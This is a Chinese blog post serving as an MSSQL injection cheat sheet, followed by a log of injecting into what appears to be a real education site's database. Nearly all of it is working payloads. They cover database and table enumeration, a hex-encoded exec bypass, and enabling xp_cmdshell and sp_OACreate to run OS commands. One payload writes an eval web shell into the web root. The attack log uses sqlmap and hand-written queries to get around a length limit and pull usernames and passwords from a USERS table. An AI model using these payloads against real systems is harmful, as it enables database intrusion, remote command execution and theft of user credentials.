年轻人不要总熬夜

mssql注入备忘录

Posted on Jul 20, 2019 By jax777

https://xz.aliyun.com/t/248 乌云drops MSSQL注射知识库 v 1.0 https://github.com/SuperKieran/WooyunDrops

这是一个 mssql 注入语句备忘录

mssql 常规语句

  • 当前数据库 db_name()

  • 当前用户 User_Name()

  • 列出数据库 SELECT top 1 Name FROM Master..SysDatabases where name not in ('master')

  • 列出表 select top 1 name from my_db_name.sys.all_objects where type='U' AND is_ms_shipped=0

  • 列出字段 select top 1 CAST(COLUMN_NAME AS NVARCHAR(4000)) from my_db_name.information_schema.columns where TABLE_NAME='my_table_name' select top 1 CAST(COLUMN_NAME AS NVARCHAR(4000)) from my_db_name.information_schema.columns where TABLE_NAME='my_table_name'and COLUMN_NAME not in('ID')

  • 取数据 select top 1 CAST(my_column_name AS NVARCHAR(4000)) from my_db_name..my_table_name

  • 判断表行数 SELECT (CHAR(113)+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM my_db_name.dbo.my_table_name)))

  • 判断表字段数 select CHAR(113)+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM my_db_name..syscolumns,my_db_name..sysobjects WHERE my_db_name..syscolumns.id=my_db_name..sysobjects.id AND my_db_name..sysobjects.name='my_table_name')

  • hex编码 select convert(int,@@version) xxxx'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--

  • xp_cmdshell SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell' 1';exec master..xp_cmdshell 'echo "<%@ LANGUAGE=Jscript %>;<%eval(Request("sb"),"unsafe")%>''" >C:\inetpub\wwwroot\congf1g.aspx' --

mssql 执行 os shell

XP_CMDSHELL

  • 执行 exec master..xp_cmdshell "whoami"

  • 开启 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 关闭一样,只是将上面的后面的那个”1”改成”0”就可以了。

  • xp_cmdshell被删除,尝试恢复 可以尝试上传xplog70.dll进行恢复 Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

SP_OACREATE

当xp_cmdshell 删除以后,可以使用SP_OACreate

  • 打开组件 EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;

  • 执行(此方法无回显) declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

偶遇注入,获取columns名时发现长度限制

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: KeyWord (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: KeyWord=' AND 4938 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4938=4938) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- limB

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: KeyWord=' AND 7003=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- HPLB

可以出表名,无法取出具体字段名

  • sqlmap 列字段语句
' AND 9249 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) AND ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) ORDER BY edu_xxxxx..syscolumns.name) ORDER BY edu_xxxxx..syscolumns.name)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- vFJB

页面报错发现试语句被截断,该点有长度限制。

' AND 4938 IN (SELECT '12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901')--

最终发现长度限制为 487

' AND 4938 IN (SELECT '1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890')--

## sqlmap已跑出数据库名 edu_xxxxx 表名 USERS

  • sqlmap跑字段名

    语句过长,无法获取字段。

    ' AND 4664 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) AND ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST(edu_xxxxx..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) FROM edu_xxxxx..syscolumns,edu_xxxxx..sysobjects WHERE edu_xxxxx..syscolumns.id=edu_xxxxx..sysobjects.id AND edu_xxxxx..sysobjects.name=CHAR(85)+CHAR(83)+CHAR(69)+CHAR(82)+CHAR(83) ORDER BY edu_xxxxx..syscolumns.name) ORDER BY edu_xxxxx..syscolumns.name)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- gjtG

  • 手工修改跑出字段名 ' AND 4938 IN (select top 1 COLUMN_NAME from edu_xxxxx.information_schema.columns where TABLE_NAME='USERS')--

' AND 4938 IN (select top 1 COLUMN_NAME from edu_xxxxx.information_schema.columns where TABLE_NAME='USERS'and COLUMN_NAME not in('USER_STATUS','LAST_LOGIN_TIME','USER_GROUP_ID','USER_ID','USER_NM','USER_TYPE','USER_NAME','USER_PWD','USER_PWD_QUT','USER_PWD_ANS','USER_BRI_DATE','USER_SEX','USER_TEL','USER_EMAIL','USER_INTRODUCE','USER_IP','USER_PROXY_IP','REMARK','USER_BUSINESS_NM','OTHER_ID','LOGIN_TIMES','zz_sf','zj','user_worktime'))--

  • 获取数据

    • 手工获取 'AND 4938 IN (select top 1 USER_PWD from edu_xxxxx..USERS)--

      'AND 4938 IN (select top 1 USER_NAME from edu_xxxxx..USERS)--

    • 已知字段后,sqlmap语句长度小于限制,可直接使用sqlmap sqlmap语句 ' AND 8120 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(USER_NAME) AS NVARCHAR(4000)),CHAR(32)) FROM (SELECT USER_NAME, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM edu_xxxxx.dbo.USERS)x WHERE LIMIT=2)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)))-- XSwE